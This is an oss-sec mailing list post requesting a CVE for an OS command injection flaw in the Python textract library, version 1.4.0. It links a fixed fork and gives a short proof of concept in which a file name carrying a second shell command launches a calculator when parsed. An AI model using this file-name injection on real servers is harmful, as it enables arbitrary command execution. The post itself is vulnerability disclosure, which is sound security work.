oss-sec mailing list archives
CVE request - textract 1.4.0 - OS Command Injection
From: Pierre Ernst <pernst () salesforce com>
Date: Thu, 20 Oct 2016 17:40:50 -0400
The Python textract component ( https://github.com/deanmalmgren/textract/tree/v1.4.0) is vulnerable to OS command injection. this fork contains a fix: https://github.com/pierre-ernst/textract Parsing a file with a malicious name leads to arbitrary OS command injection, this is especially risky when parsing user-supplied files on a server (e.g. uploaded files) PoC: import textract import sys import os # create a file with a malicious name and arbitrary content fileName = './test";gnome-calculator;#.pdf' file = open(fileName,'w+') file.write('Pierre Ernst, Salesforce') file.close() # parse newly created file text = textract.process(fileName) print text # cleanup os.remove(fileName); -- Pierre Ernst Salesforce
Current thread:
- CVE request - textract 1.4.0 - OS Command Injection Pierre Ernst (Oct 20)
- Re: CVE request - textract 1.4.0 - OS Command Injection Pierre Ernst (Nov 17)